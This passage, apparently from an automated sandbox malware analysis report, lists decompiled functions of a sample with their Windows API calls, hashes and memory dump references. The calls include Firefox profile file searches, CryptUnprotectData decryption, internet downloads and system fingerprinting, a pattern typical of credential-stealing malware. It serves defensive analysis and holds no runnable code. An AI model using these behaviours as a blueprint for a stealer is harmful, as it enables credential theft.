                                                                                          • StrCmpCA.SHLWAPI(?,00421564), ref: 0040F5C5
                                                                                          • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040F8F1
                                                                                          • FindClose.KERNEL32(000000FF), ref: 0040F903
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                          • String ID: P2#v$prefs.js$1#v
                                                                                          • API String ID: 3334442632-2885088814
                                                                                          • Opcode ID: d3f22cb6985d2201e857ce3b604c74ca8ddf06a787430cbd7a848bc340e67d56
                                                                                          • Instruction ID: 51e7ee45db09aa5f39b002a0c415dffe3bc9b22f3a493195af03bb486277efdd
                                                                                          • Opcode Fuzzy Hash: d3f22cb6985d2201e857ce3b604c74ca8ddf06a787430cbd7a848bc340e67d56
                                                                                          • Instruction Fuzzy Hash: 00B17571901108ABCB24FF61DC56FEE7379AF54314F0081BEA40A57191EF386B99CB9A
                                                                                          Function 0040D8C0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 255fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00421454,00420B96), ref: 0040D92B
                                                                                          • StrCmpCA.SHLWAPI(?,00421458), ref: 0040D973
                                                                                          • StrCmpCA.SHLWAPI(?,0042145C), ref: 0040D989
                                                                                          • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040DC0C
                                                                                          • FindClose.KERNEL32(000000FF), ref: 0040DC1E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                          • String ID: P2#v$1#v
                                                                                          • API String ID: 3334442632-762677545
                                                                                          • Opcode ID: c6eba386c8d7739a1fa8b96ae4cee9d924a5201b05d2867343646b982982c94b
                                                                                          • Instruction ID: be130f63dcff9d07870f4f5a4cae658f80ac6a3b159c82c28f33fed987b29411
                                                                                          • Opcode Fuzzy Hash: c6eba386c8d7739a1fa8b96ae4cee9d924a5201b05d2867343646b982982c94b
                                                                                          • Instruction Fuzzy Hash: 23914672900204A7CB14FBB1DC56DED737DAF94354F00866EF80A66191EE389B5C8B9B
                                                                                          Function 00401710 Relevance: 18.0, APIs: 7, Strings: 3, Instructions: 492fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425004,?,00401F6C,?,004250AC,?,?,00000000,?,00000000), ref: 00401963
                                                                                          • StrCmpCA.SHLWAPI(?,00425154), ref: 004019B3
                                                                                          • StrCmpCA.SHLWAPI(?,004251FC), ref: 004019C9
                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D80
                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 00401E0A
                                                                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E60
                                                                                          • FindClose.KERNEL32(000000FF), ref: 00401E72
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                          • String ID: P2#v$\*.*$1#v
                                                                                          • API String ID: 1415058207-2075649900
                                                                                          • Opcode ID: e3e7a00d507c5a686b07f891d32b492613cb94bc3e70352f403bc48025ba8a20
                                                                                          • Instruction ID: 16b9519e73a2a048c1aa4c2f75882a05a68b4b793ed3d445f0fb30e7c05d6763
                                                                                          • Opcode Fuzzy Hash: e3e7a00d507c5a686b07f891d32b492613cb94bc3e70352f403bc48025ba8a20
                                                                                          • Instruction Fuzzy Hash: 83123F71911118ABCB15FB61CC96EEE7338AF54314F4041AEB50B62091EF786BD8CF9A
                                                                                          Function 0040E270 Relevance: 14.5, APIs: 4, Strings: 4, Instructions: 514fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420C1F), ref: 0040E2E2
                                                                                          • StrCmpCA.SHLWAPI(?,0042149C), ref: 0040E332
                                                                                          • StrCmpCA.SHLWAPI(?,004214A0), ref: 0040E348
                                                                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EA1F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                          • String ID: .@$P2#v$\*.*$1#v
                                                                                          • API String ID: 433455689-4077462073
                                                                                          • Opcode ID: 2c73111a52c0aa8f5a93a007cb1592271aff26c14f0af4420613aba39660b1dd
                                                                                          • Instruction ID: 20f818950e8166c8af1a449285f1ab07a785d4baccce5c5ed3abadeee2d63442
                                                                                          • Opcode Fuzzy Hash: 2c73111a52c0aa8f5a93a007cb1592271aff26c14f0af4420613aba39660b1dd
                                                                                          • Instruction Fuzzy Hash: BE125331911118ABCB14FB61DC5AEED7338AF54314F4045AEB90B62091EF786FD8CB9A
                                                                                          Function 00405000 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040501A
                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00405021
                                                                                          • InternetOpenA.WININET(00420DC7,00000000,00000000,00000000,00000000), ref: 0040503A
                                                                                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405061
                                                                                          • InternetReadFile.WININET(004159BB,?,00000400,00000000), ref: 00405091
                                                                                          • KiUserExceptionDispatcher.NTDLL(00000000,?), ref: 004050DA
                                                                                          • InternetCloseHandle.WININET(004159BB), ref: 00405109
                                                                                          • InternetCloseHandle.WININET(?), ref: 00405116
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Internet$CloseHandleHeapOpen$AllocateDispatcherExceptionFileProcessReadUser
                                                                                          • String ID:
                                                                                          • API String ID: 1337183907-0
                                                                                          • Opcode ID: f444c6f7ddd9144f10c727580b8ae5c860da4ae62cedfb23b3109a919a7fad71
                                                                                          • Instruction ID: 839bf57ea29f75d8981f3e40a03c3eb3ba9ac3aa2e1ac21d7b315b502f3c448d
                                                                                          • Opcode Fuzzy Hash: f444c6f7ddd9144f10c727580b8ae5c860da4ae62cedfb23b3109a919a7fad71
                                                                                          • Instruction Fuzzy Hash: 1D31E9B4A00618ABDB20CF54DD85BDDB7B5EF48304F5081E9BA09A7281C7746AC68F99
                                                                                          Function 00417630 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                          • GetKeyboardLayoutList.USER32(00000000,00000000,0042059F), ref: 00417681
                                                                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00417699
                                                                                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 004176AD
                                                                                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417702
                                                                                          • LocalFree.KERNEL32(00000000), ref: 004177C2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                          • String ID: /
                                                                                          • API String ID: 3090951853-4001269591
                                                                                          • Opcode ID: 6e5906619e98d4ad47cd61a06163630aa8c8f8e5491a3d82f811181143fa04bc
                                                                                          • Instruction ID: c1db32f68e501b8527b0747275b78d72b64e7f1ab46943026d097e8974929a8d
                                                                                          • Opcode Fuzzy Hash: 6e5906619e98d4ad47cd61a06163630aa8c8f8e5491a3d82f811181143fa04bc
                                                                                          • Instruction Fuzzy Hash: 49418F71941118ABCB24DF94DC89FEEB374FB54314F2041DAE40A62191DB782F85CFA5
                                                                                          Function 004190A0 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004190BE
                                                                                          • Process32First.KERNEL32(00420AB3,00000128), ref: 004190D2
                                                                                          • Process32Next.KERNEL32(00420AB3,00000128), ref: 004190E7
                                                                                          • StrCmpCA.SHLWAPI(?,00000000), ref: 004190FC
                                                                                          • CloseHandle.KERNEL32(00420AB3), ref: 0041911A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 420147892-0
                                                                                          • Opcode ID: 53cc5b1a25e9de08871f2f161f83c20120fe0a383d746f94447c3d4f9de0246b
                                                                                          • Instruction ID: 54ad55f7a4b81502d496241441e07260b80a378e6eebdd4a9cd1ea64267145a6
                                                                                          • Opcode Fuzzy Hash: 53cc5b1a25e9de08871f2f161f83c20120fe0a383d746f94447c3d4f9de0246b
                                                                                          • Instruction Fuzzy Hash: 1E010875A00208FBDB20DFA4CD99BEEBBF9AF08700F104199E909A7250DB749E85DF55
                                                                                          Function 00409BB0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409BD4
                                                                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BF3
                                                                                          • memcpy.MSVCRT ref: 00409C16
                                                                                          • LocalFree.KERNEL32(?), ref: 00409C23
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3243516280-0
                                                                                          • Opcode ID: 7bf331572f1629f969e766ff9da9bf80e1d95d1acc3dba2254ec725ed3047747
                                                                                          • Instruction ID: 89a0ba0d6d0461e137ce63e6e87bc55d2f461512d11096c1476870e855060961
                                                                                          • Opcode Fuzzy Hash: 7bf331572f1629f969e766ff9da9bf80e1d95d1acc3dba2254ec725ed3047747
                                                                                          • Instruction Fuzzy Hash: 7111E8B8A00209DFCB04DF94D984AAEB7B6FF88300F108569E915A7390D730AE51CF65
                                                                                          Function 004174D0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0081AD90,00000000,?,00420DE0,00000000,?,00000000,00000000), ref: 00417503
                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,0081AD90,00000000,?,00420DE0,00000000,?,00000000,00000000,?), ref: 0041750A
                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0081AD90,00000000,?,00420DE0,00000000,?,00000000,00000000,?), ref: 0041751D
                                                                                          • wsprintfA.USER32 ref: 00417557
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
